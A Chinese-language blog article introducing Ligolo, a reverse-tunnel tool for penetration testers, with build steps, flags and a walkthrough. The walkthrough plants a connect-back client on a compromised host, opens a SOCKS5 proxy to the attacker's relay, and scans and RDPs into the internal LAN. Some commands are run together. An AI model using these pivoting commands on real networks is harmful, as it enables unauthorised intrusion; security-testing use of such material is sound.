您好,登錄后才能下訂單哦!
這篇文章將為大家詳細(xì)講解有關(guān)Ligolo是什么,小編覺得挺實用的,因此分享給大家做個參考,希望大家閱讀完這篇文章后可以有所收獲。
Ligolo是一款專為滲透測試人員設(shè)計的反向隧道工具。實際上,它是一款實現(xiàn)和使用都非常簡單的輕量級工具,可以幫助滲透測試研究人員輕松通過一個反向連接建立一個完全安全的SOCKS5或TCP通信隧道。
跟Meterpreter以及Autoroute + Socks4a相比,Ligolo的運行速度更快,并且更加穩(wěn)定。
1、TLS 1.3隧道,帶有TLS綁定;
2、多平臺支持,包括Windows、Linux和macOS等;
3、多路復(fù)用(1條TCP連接可多路復(fù)用);
4、SOCKS5代理或中繼;
假設(shè)你在一次外部安全審計任務(wù)過程中,現(xiàn)在已經(jīng)成功入侵了一臺Windows/Linux/macOS服務(wù)器。這臺服務(wù)器位于目標(biāo)組織的本地局域網(wǎng)絡(luò)之中,而你想要與該網(wǎng)絡(luò)內(nèi)的其他主機建立通信連接。
那么此時,Ligolo就可以幫助你實現(xiàn)這個目標(biāo)。它可以給我們建立一條通信隨到并訪問目標(biāo)內(nèi)部服務(wù)器的資源。4
使用Proxychains (WAN)實現(xiàn)RDP通信連接中繼。
下面給出的圖片是該工具在兩臺100MB/s主機之間的性能圖,但實際情況需取決于目標(biāo)系統(tǒng)和網(wǎng)絡(luò)配置。
首先,請確保你的系統(tǒng)中已經(jīng)安裝了Go環(huán)境/工具。接下來,使用下列命令獲取Ligolo項目遠(yuǎn)嗎和相關(guān)依賴組件:
cd `go env GOPATH`/srcgit clone https://github.com/sysdream/ligolocd ligolomake dep
生成自簽名的TLS證書,并存放至項目的certs
目錄之中:
make certs TLS_HOST=example.com
當(dāng)然了,你還可以通過TLS_CERT
選項來使用你自己的TLS證書:
make build-all TLS_CERT=certs/mycert.pem
最后,進(jìn)行項目代碼構(gòu)建。
make build-all
make build
Usage of localrelay: -certfile string The TLS server certificate (default "certs/server.crt") -keyfile string The TLS server key (default "certs/server.key") -localserver string The local server address (your proxychains parameter) (default "127.0.0.1:1080") -relayserver string The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
Usage of ligolo: -autorestart Attempt to reconnect in case of an exception -relayserver string The relay server (the connect-back address) (default "127.0.0.1:5555") -skipverify Skip TLS certificate pinning verification -targetserver string The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
Ligolo由下列兩個模塊組成:
1、 localrelay
2、 ligolo
Localrelay需要在攻擊者控制的服務(wù)器端運行,Ligolo則需要在目標(biāo)主機上運行。
對于localrelay,你可以直接使用默認(rèn)選項,它將監(jiān)聽端口5555的所有接口,并等待來自ligolo的連接。
對于ligolo,你必須使用-relayserver ip:port
參數(shù)的指定中繼服務(wù)器的IP地址,也就是攻擊者服務(wù)器的IP地址。
你可以使用-h選項查看工具的幫助命令。
Localrelay和ligolo之間的連接建立成功之后,工具會在中繼服務(wù)器的TCP端口1080上設(shè)置一個SOCKS5代理,接下來你就可以使用你喜歡的工具來滲透目標(biāo)的LAN網(wǎng)絡(luò)了。
在攻擊者服務(wù)器端,運行下列命令:
./bin/localrelay_linux_amd64
在目標(biāo)主機中,運行下列命令:
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
一旦通信連接建立成功,請在ProxyChains
的配置文件中設(shè)置下列參數(shù)(在攻擊者服務(wù)器端):
[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"socks5 127.0.0.1 1080
最后:
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A$ proxychains rdesktop 10.0.0.123
Ligolo項目的開發(fā)與發(fā)布遵循GNU General Public License v3.0開源許可證協(xié)議。
關(guān)于“Ligolo是什么”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,使各位可以學(xué)到更多知識,如果覺得文章不錯,請把它分享出去讓更多的人看到。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。